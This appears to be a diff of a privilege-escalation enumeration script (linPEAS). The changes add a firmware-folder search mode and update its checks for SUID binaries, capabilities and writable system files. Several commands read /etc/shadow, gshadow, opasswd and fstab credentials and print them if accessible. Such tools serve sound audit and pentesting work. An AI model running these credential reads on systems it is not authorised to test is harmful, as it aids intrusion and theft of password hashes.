"\.plan$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.plan$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING\" | grep -E \"\.profile$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".profile"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING" | grep -E "\.profile$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.profile$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING\" | grep -E \"\.recently-used\.xbel$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".recently-used.xbel"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING" | grep -E "\.recently-used\.xbel$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.recently-used\.xbel$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING\" | grep -E \"\.rhosts$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".rhosts"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING" | grep -E "\.rhosts$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.rhosts$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING\" | grep -E \"\.sudo_as_admin_successful$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".sudo_as_admin_successful"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING" | grep -E "\.sudo_as_admin_successful$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.sudo_as_admin_successful$,${SED_RED},"; done; echo ""; fi +if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then + print_2title "Checking leaks in git repositories" + printf "%s\n" "$PSTORAGE_GITHUB" | while read f; do + if echo "$f" | grep -Eq ".git$"; then + git_dirname=$(dirname "$f") + if [ "$MACPEAS" ]; then + execBin "GitLeaks (checking $git_dirname)" "https://github.com/zricethezav/gitleaks" "$FAT_LINPEAS_GITLEAKS_MACOS" "detect -s '$git_dirname' -v | grep -E 'Description|Match|Secret|Message|Date'" + else + execBin "GitLeaks (checking $git_dirname)" "https://github.com/zricethezav/gitleaks" "$FAT_LINPEAS_GITLEAKS_LINUX" "detect -s '$git_dirname' -v | grep -E 'Description|Match|Secret|Message|Date'" + fi + fi + done +fi + fi echo '' echo '' @@ -3502,20 +4223,16 @@ check_critial_root_path(){ - - - - ##-- IF) SUID print_2title "SUID - Check easy privesc, exploits and write perms" -print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" +print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid" if ! [ "$STRINGS" ]; then echo_not_found "strings" fi if ! [ "$STRACE" ]; then echo_not_found "strace" fi -suids_files=$(find / -perm -4000 -type f ! -path "/dev/*" 2>/dev/null) +suids_files=$(find $ROOT_FOLDER -perm -4000 -type f ! -path "/dev/*" 2>/dev/null) for s in $suids_files; do s=$(ls -lahtr "$s") #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder @@ -3541,7 +4258,7 @@ for s in $suids_files; do if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," else - echo "$s (Unknown SUID binary)" | sed -${E} "s,/.*,${SED_RED}," + echo "$s (Unknown SUID binary!)" | sed -${E} "s,/.*,${SED_RED}," printf $ITALIC if ! [ "$FAST" ] && [ "$STRINGS" ]; then $STRINGS "$sname" 2>/dev/null | sort | uniq | while read sline; do @@ -3580,8 +4297,8 @@ echo "" ##-- IF) SGID print_2title "SGID" -print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" -sgids_files=$(find / -perm -2000 -type f ! -path "/dev/*" 2>/dev/null) +print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid" +sgids_files=$(find $ROOT_FOLDER -perm -2000 -type f ! -path "/dev/*" 2>/dev/null) for s in $sgids_files; do s=$(ls -lahtr "$s") #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder @@ -3639,63 +4356,75 @@ done; echo "" ##-- IF) Misconfigured ld.so -print_2title "Checking misconfigurations of ld.so" -print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#ld-so" -printf $ITALIC"/etc/ld.so.conf\n"$NC; -cat /etc/ld.so.conf 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" -cat /etc/ld.so.conf 2>/dev/null | while read l; do - if echo "$l" | grep -q include; then - ini_path=$(echo "$l" | cut -d " " -f 2) - fpath=$(dirname "$ini_path") - if [ "$(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - printf $ITALIC"$fpath\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" - for f in $fpath/*; do - printf $ITALIC" $f\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" - cat "$f" | grep -v "^#" | sed -${E} "s,$ldsoconfdG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" - done - fi -done -echo "" - -##-- IF) Capabilities -print_2title "Capabilities" -print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities" -echo "Current capabilities:" -(capsh --print 2>/dev/null | grep "Current:" | sed -${E} "s,$capsB,${SED_RED_YELLOW}," ) || echo_not_found "capsh" -(cat "/proc/$$/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$$/status" -echo "" -echo "Shell capabilities:" -(capsh --decode=0x"$(cat /proc/$PPID/status 2>/dev/null | grep CapEff | awk '{print $2}')" 2>/dev/null) || echo_not_found "capsh" -(cat "/proc/$PPID/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$PPID/status" -echo "" -echo "Files with capabilities (limited to 50):" -getcap -r / 2>/dev/null | head -n 50 | while read cb; do - capsVB_vuln="" - - for capVB in $capsVB; do - capname="$(echo $capVB | cut -d ':' -f 1)" - capbins="$(echo $capVB | cut -d ':' -f 2)" - if [ "$(echo $cb | grep -Ei $capname)" ] && [ "$(echo $cb | grep -E $capbins)" ]; then - echo "$cb" | sed -${E} "s,.*,${SED_RED_YELLOW}," - capsVB_vuln="1" - break +if ! [ "$SEARCH_IN_FOLDER" ] && ! [ "$IAMROOT" ]; then + print_2title "Checking misconfigurations of ld.so" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld-so" + printf $ITALIC"/etc/ld.so.conf\n"$NC; + cat /etc/ld.so.conf 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" + cat /etc/ld.so.conf 2>/dev/null | while read l; do + if echo "$l" | grep -q include; then + ini_path=$(echo "$l" | cut -d " " -f 2) + fpath=$(dirname "$ini_path") + if [ "$(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + printf $ITALIC"$fpath\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" + for f in $fpath/*; do + printf $ITALIC" $f\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" + cat "$f" | grep -v "^#" | sed -${E} "s,$ldsoconfdG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" + done fi done - - if ! [ "$capsVB_vuln" ]; then - echo "$cb" | sed -${E} "s,$capsB,${SED_RED}," - fi + echo "" +fi - if ! [ "$IAMROOT" ] && [ -w "$(echo $cb | cut -d" " -f1)" ]; then - echo "$cb is writable" | sed -${E} "s,.*,${SED_RED}," +##-- IF) Capabilities +if ! [ "$SEARCH_IN_FOLDER" ]; then + print_2title "Capabilities" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities" + if [ "$(command -v capsh)" ]; then + echo "Current env capabilities:" + (capsh --print 2>/dev/null | grep "Current:" | sed -${E} "s,$capsB,${SED_RED_YELLOW}," ) || echo_not_found "capsh" + echo "Current proc capabilities:" + (cat "/proc/$$/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$$/status" + echo "" + echo "Parent Shell capabilities:" + (capsh --decode=0x"$(cat /proc/$PPID/status 2>/dev/null | grep CapEff | awk '{print $2}')" 2>/dev/null) || echo_not_found "capsh" + else + echo "Current capabilities:" + cat /proc/self/status | grep Cap | sed -${E} "s, .*,${SED_RED},g" | sed -${E} "s,0000000000000000|0000003fffffffff,${SED_GREEN},g" + echo "" + echo "Shell capabilities:" + cat /proc/$PPID/status | grep Cap | sed -${E} "s, .*,${SED_RED},g" | sed -${E} "s,0000000000000000|0000003fffffffff,${SED_GREEN},g" fi -done -echo "" + echo "" + echo "Files with capabilities (limited to 50):" + getcap -r / 2>/dev/null | head -n 50 | while read cb; do + capsVB_vuln="" + + for capVB in $capsVB; do + capname="$(echo $capVB | cut -d ':' -f 1)" + capbins="$(echo $capVB | cut -d ':' -f 2)" + if [ "$(echo $cb | grep -Ei $capname)" ] && [ "$(echo $cb | grep -E $capbins)" ]; then + echo "$cb" | sed -${E} "s,.*,${SED_RED_YELLOW}," + capsVB_vuln="1" + break + fi + done + + if ! [ "$capsVB_vuln" ]; then + echo "$cb" | sed -${E} "s,$capsB,${SED_RED}," + fi + + if ! [ "$IAMROOT" ] && [ -w "$(echo $cb | cut -d" " -f1)" ]; then + echo "$cb is writable" | sed -${E} "s,.*,${SED_RED}," + fi + done + echo "" +fi ##-- IF) Users with capabilities if [ -f "/etc/security/capability.conf" ] || [ "$DEBUG" ]; then print_2title "Users with capabilities" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities" if [ -f "/etc/security/capability.conf" ]; then grep -v '^#\|none\|^$' /etc/security/capability.conf 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," else echo_not_found "/etc/security/capability.conf" @@ -3703,10 +4432,23 @@ if [ -f "/etc/security/capability.conf" ] || [ "$DEBUG" ]; then echo "" fi +##-- IF) AppArmor profiles to prevent suid/capabilities abuse +if ! [ "$SEARCH_IN_FOLDER" ]; then + if [ -d "/etc/apparmor.d/" ] && [ -r "/etc/apparmor.d/" ]; then + print_2title "AppArmor binary profiles" + ls -l /etc/apparmor.d/ 2>/dev/null | grep -E "^-" | grep "\." + echo "" + fi +fi + ##-- IF) Files with ACLs print_2title "Files with ACLs (limited to 50)" -print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#acls" -( (getfacl -t -s -R -p /bin /etc $HOMESEARCH /opt /sbin /usr /tmp /root 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," +print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#acls" +if ! [ "$SEARCH_IN_FOLDER" ]; then + ( (getfacl -t -s -R -p /bin /etc $HOMESEARCH /opt /sbin /usr /tmp /root 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," +else + ( (getfacl -t -s -R -p $SEARCH_IN_FOLDER 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," +fi if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && ! [ "$(command -v getfacl)" ]; then #Find ACL files in macos (veeeery slow) ls -RAle / 2>/dev/null | grep -v "group:everyone deny delete" | grep -E -B1 "\d: " | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," @@ -3722,196 +4464,240 @@ echo "" #echo "" ##-- IF) .sh files in PATH -print_2title ".sh files in path" -print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path" -echo $PATH | tr ":" "\n" | while read d; do - for f in $(find "$d" -name "*.sh" 2>/dev/null); do - if ! [ "$IAMROOT" ] && [ -O "$f" ]; then - echo "You own the script: $f" | sed -${E} "s,.*,${SED_RED}," - elif ! [ "$IAMROOT" ] && [ -w "$f" ]; then #If write permision, win found (no check exploits) - echo "You can write script: $f" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else - echo $f | sed -${E} "s,$shscripsG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED},"; - fi - done -done -echo "" - - -broken_links=$(find "$d" -type l 2>/dev/null | xargs file 2>/dev/null | grep broken) -if [ "$broken_links" ] || [ "$DEBUG" ]; then - print_2title "Broken links in path" +if ! [ "$SEARCH_IN_FOLDER" ]; then + print_2title ".sh files in path" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path" echo $PATH | tr ":" "\n" | while read d; do - find "$d" -type l 2>/dev/null | xargs file 2>/dev/null | grep broken | sed -${E} "s,broken,${SED_RED},"; + for f in $(find "$d" -name "*.sh" 2>/dev/null); do + if ! [ "$IAMROOT" ] && [ -O "$f" ]; then + echo "You own the script: $f" | sed -${E} "s,.*,${SED_RED}," + elif ! [ "$IAMROOT" ] && [ -w "$f" ]; then #If write permision, win found (no check exploits) + echo "You can write script: $f" | sed -${E} "s,.*,${SED_RED_YELLOW}," + else + echo $f | sed -${E} "s,$shscripsG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED},"; + fi + done done echo "" + + broken_links=$(find "$d" -type l 2>/dev/null | xargs file 2>/dev/null | grep broken) + if [ "$broken_links" ] || [ "$DEBUG" ]; then + print_2title "Broken links in path" + echo $PATH | tr ":" "\n" | while read d; do + find "$d" -type l 2>/dev/null | xargs file 2>/dev/null | grep broken | sed -${E} "s,broken,${SED_RED},"; + done + echo "" + fi fi +##-- IF) Date times inside firmware +if [ "$SEARCH_IN_FOLDER" ]; then + print_2title "FIles datetimes inside the firmware (limit 50)" + find "$SEARCH_IN_FOLDER" -type f -printf "%T+\n" 2>/dev/null | sort | uniq -c | sort | head -n 50 + echo "To find a file with an specific date execute: find \"$SEARCH_IN_FOLDER\" -type f -printf \"%T+ %p\n\" 2>/dev/null | grep \"\"" + echo "" +fi + +##-- IF) Executable files added by user +print_2title "Executable files potentially added by user (limit 70)" +if ! [ "$SEARCH_IN_FOLDER" ]; then + find / -type f -executable -printf "%T+ %p\n" 2>/dev/null | grep -Ev "000|/site-packages|/python|/node_modules|\.sample|/gems" | sort -r | head -n 70 +else + find "$SEARCH_IN_FOLDER" -type f -executable -printf "%T+ %p\n" 2>/dev/null | grep -Ev "/site-packages|/python|/node_modules|\.sample|/gems" | sort -r | head -n 70 +fi +echo "" + + if [ "$MACPEAS" ]; then print_2title "Unsigned Applications" macosNotSigned /System/Applications fi -##-- IF) Unexpected folders in / -print_2title "Unexpected in root" -if [ "$MACPEAS" ]; then - (find / -maxdepth 1 | grep -Ev "$commonrootdirsMacG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found -else - (find / -maxdepth 1 | grep -Ev "$commonrootdirsG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found +##-- IF) Unexpected in /opt +if ! [ "$SEARCH_IN_FOLDER" ]; then + if [ "$(ls /opt 2>/dev/null)" ]; then + print_2title "Unexpected in /opt (usually empty)" + ls -la /opt + echo "" + fi +fi + +##-- IF) Unexpected folders in / +if ! [ "$SEARCH_IN_FOLDER" ]; then + print_2title "Unexpected in root" + if [ "$MACPEAS" ]; then + (find $ROOT_FOLDER -maxdepth 1 | grep -Ev "$commonrootdirsMacG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found + else + (find $ROOT_FOLDER -maxdepth 1 | grep -Ev "$commonrootdirsG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found + fi + echo "" fi -echo "" ##-- IF) Files (scripts) in /etc/profile.d/ -print_2title "Files (scripts) in /etc/profile.d/" -print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#profiles-files" -if [ ! "$MACPEAS" ] && ! [ "$IAMROOT" ]; then #Those folders don´t exist on a MacOS - (ls -la /etc/profile.d/ 2>/dev/null | sed -${E} "s,$profiledG,${SED_GREEN},") || echo_not_found "/etc/profile.d/" - check_critial_root_path "/etc/profile" - check_critial_root_path "/etc/profile.d/" +if ! [ "$SEARCH_IN_FOLDER" ]; then + print_2title "Files (scripts) in /etc/profile.d/" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#profiles-files" + if [ ! "$MACPEAS" ] && ! [ "$IAMROOT" ]; then #Those folders don´t exist on a MacOS + (ls -la /etc/profile.d/ 2>/dev/null | sed -${E} "s,$profiledG,${SED_GREEN},") || echo_not_found "/etc/profile.d/" + check_critial_root_path "/etc/profile" + check_critial_root_path "/etc/profile.d/" + fi + echo "" fi -echo "" ##-- IF) Files (scripts) in /etc/init.d/ + if ! [ "$SEARCH_IN_FOLDER" ]; then print_2title "Permissions in init, init.d, systemd, and rc.d" -print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d" -if [ ! "$MACPEAS" ] && ! [ "$IAMROOT" ]; then #Those folders don´t exist on a MacOS - check_critial_root_path "/etc/init/" - check_critial_root_path "/etc/init.d/" - check_critial_root_path "/etc/rc.d/init.d" - check_critial_root_path "/usr/local/etc/rc.d" - check_critial_root_path "/etc/rc.d" - check_critial_root_path "/etc/systemd/" - check_critial_root_path "/lib/systemd/" -fi + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d" + if [ ! "$MACPEAS" ] && ! [ "$IAMROOT" ]; then #Those folders don´t exist on a MacOS + check_critial_root_path "/etc/init/" + check_critial_root_path "/etc/init.d/" + check_critial_root_path "/etc/rc.d/init.d" + check_critial_root_path "/usr/local/etc/rc.d" + check_critial_root_path "/etc/rc.d" + check_critial_root_path "/etc/systemd/" + check_critial_root_path "/lib/systemd/" + fi -echo "" + echo "" +fi ##-- IF) Hashes in passwd file -print_list "Hashes inside passwd file? ........... " -if grep -qv '^[^:]*:[x\*\!]\|^#\|^$' /etc/passwd /etc/master.passwd /etc/group 2>/dev/null; then grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null | sed -${E} "s,.*,${SED_RED}," -else echo_no +if ! [ "$SEARCH_IN_FOLDER" ]; then + print_list "Hashes inside passwd file? ........... " + if grep -qv '^[^:]*:[x\*\!]\|^#\|^$' /etc/passwd /etc/master.passwd /etc/group 2>/dev/null; then grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null | sed -${E} "s,.*,${SED_RED}," + else echo_no + fi + + ##-- IF) Writable in passwd file + print_list "Writable passwd file? ................ " + if [ -w "/etc/passwd" ]; then echo "/etc/passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," + elif [ -w "/etc/pwd.db" ]; then echo "/etc/pwd.db is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," + elif [ -w "/etc/master.passwd" ]; then echo "/etc/master.passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," + else echo_no + fi + + ##-- IF) Credentials in fstab + print_list "Credentials in fstab/mtab? ........... " + if grep -qE "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null; then grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null | sed -${E} "s,.*,${SED_RED}," + else echo_no + fi + + ##-- IF) Read shadow files + print_list "Can I read shadow files? ............. " + if [ "$(cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null)" ]; then cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null | sed -${E} "s,.*,${SED_RED}," + else echo_no + fi + + print_list "Can I read shadow plists? ............ " + possible_check="" + (for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"; defaults read "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no + + print_list "Can I write shadow plists? ........... " + possible_check="" + (for l in /var/db/dslocal/nodes/Default/users/*; do if [ -w "$l" ];then echo "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no + + ##-- IF) Read opasswd file + print_list "Can I read opasswd file? ............. " + if [ -r "/etc/security/opasswd" ]; then cat /etc/security/opasswd 2>/dev/null || echo "" + else echo_no + fi + + ##-- IF) network-scripts + print_list "Can I write in network-scripts? ...... " + if ! [ "$IAMROOT" ] && [ -w "/etc/sysconfig/network-scripts/" ]; then echo "You have write privileges on /etc/sysconfig/network-scripts/" | sed -${E} "s,.*,${SED_RED_YELLOW}," + elif [ "$(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges on $(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW}," + else echo_no + fi + + ##-- IF) Read root dir + print_list "Can I read root folder? .............. " + (ls -al /root/ 2>/dev/null | grep -vi "total 0") || echo_no + echo "" fi -##-- IF) Writable in passwd file -print_list "Writable passwd file? ................ " -if [ -w "/etc/passwd" ]; then echo "/etc/passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," -elif [ -w "/etc/pwd.db" ]; then echo "/etc/pwd.db is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," -elif [ -w "/etc/master.passwd" ]; then echo "/etc/master.passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," -else echo_no -fi - -##-- IF) Credentials in fstab -print_list "Credentials in fstab/mtab? ........... " -if grep -qE "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null; then grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null | sed -${E} "s,.*,${SED_RED}," -else echo_no -fi - -##-- IF) Read shadow files -print_list "Can I read shadow files? ............. " -if [ "$(cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null)" ]; then cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null | sed -${E} "s,.*,${SED_RED}," -else echo_no -fi - -print_list "Can I read shadow plists? ............ " -possible_check="" -(for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"; defaults read "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no - -print_list "Can I write shadow plists? ........... " -possible_check="" -(for l in /var/db/dslocal/nodes/Default/users/*; do if [ -w "$l" ];then echo "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no - -##-- IF) Read opasswd file -print_list "Can I read opasswd file? ............. " -if [ -r "/etc/security/opasswd" ]; then cat /etc/security/opasswd 2>/dev/null || echo "" -else echo_no -fi - -##-- IF) network-scripts -print_list "Can I write in network-scripts? ...... " -if ! [ "$IAMROOT" ] && [ -w "/etc/sysconfig/network-scripts/" ]; then echo "You have write privileges on /etc/sysconfig/network-scripts/" | sed -${E} "s,.*,${SED_RED_YELLOW}," -elif [ "$(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges on $(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW}," -else echo_no -fi - -##-- IF) Read root dir -print_list "Can I read root folder? .............. " -(ls -al /root/ 2>/dev/null | grep -vi "total 0") || echo_no -echo "" - ##-- IF) Root files in home dirs -print_2title "Searching root files in home dirs (limit 30)" -(find $HOMESEARCH -user root 2>/dev/null | head -n 30 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_RED},") || echo_not_found -echo "" +if ! [ "$SEARCH_IN_FOLDER" ]; then + print_2title "Searching root files in home dirs (limit 30)" + (find $HOMESEARCH -user root 2>/dev/null | head -n 30 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_RED},") || echo_not_found + echo "" +fi ##-- IF) Others files in my dirs if ! [ "$IAMROOT" ]; then print_2title "Searching folders owned by me containing others files on it (limit 100)" - (find / -type d -user "$USER" ! -path "/proc/*" 2>/dev/null | head -n 100 | while read d; do find "$d" -maxdepth 1 ! -user "$USER" \( -type f -or -type d \) -exec dirname {} \; 2>/dev/null; done) | sort | uniq | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${C}[1;13m&${C}[0m,g" + (find $ROOT_FOLDER -type d -user "$USER" ! -path "/proc/*" 2>/dev/null | head -n 100 | while read d; do find "$d" -maxdepth 1 ! -user "$USER" \( -type f -or -type d \) -exec dirname {} \; 2>/dev/null; done) | sort | uniq | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${C}[1;13m&${C}[0m,g" echo "" fi ##-- IF) Readable files belonging to root and not world readable if ! [ "$IAMROOT" ]; then print_2title "Readable files belonging to root and readable by me but not world readable" - (find / -type f -user root ! -perm -o=r 2>/dev/null | grep -v "\.journal" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null | sed -${E} "s,/.*,${SED_RED},"; fi; done) || echo_not_found + (find $ROOT_FOLDER -type f -user root ! -perm -o=r ! -path "/proc/*" 2>/dev/null | grep -v "\.journal" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null | sed -${E} "s,/.*,${SED_RED},"; fi; done) || echo_not_found echo "" fi ##-- IF) Modified interesting files into specific folders in the last 5mins print_2title "Modified interesting files in the last 5mins (limit 100)" -find / -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" ! -path "/private/var/*" 2>/dev/null | grep -v "/linpeas" | head -n 100 | sed -${E} "s,$Wfolders,${SED_RED}," +find $ROOT_FOLDER -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" ! -path "/private/var/*" 2>/dev/null | grep -v "/linpeas" | head -n 100 | sed -${E} "s,$Wfolders,${SED_RED}," echo "" ##-- IF) Writable log files -print_2title "Writable log files (logrotten) (limit 100)" -print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#logrotate-exploitation" -logrotate --version 2>/dev/null || echo_not_found "logrotate" -lastWlogFolder="ImPOsSiBleeElastWlogFolder" 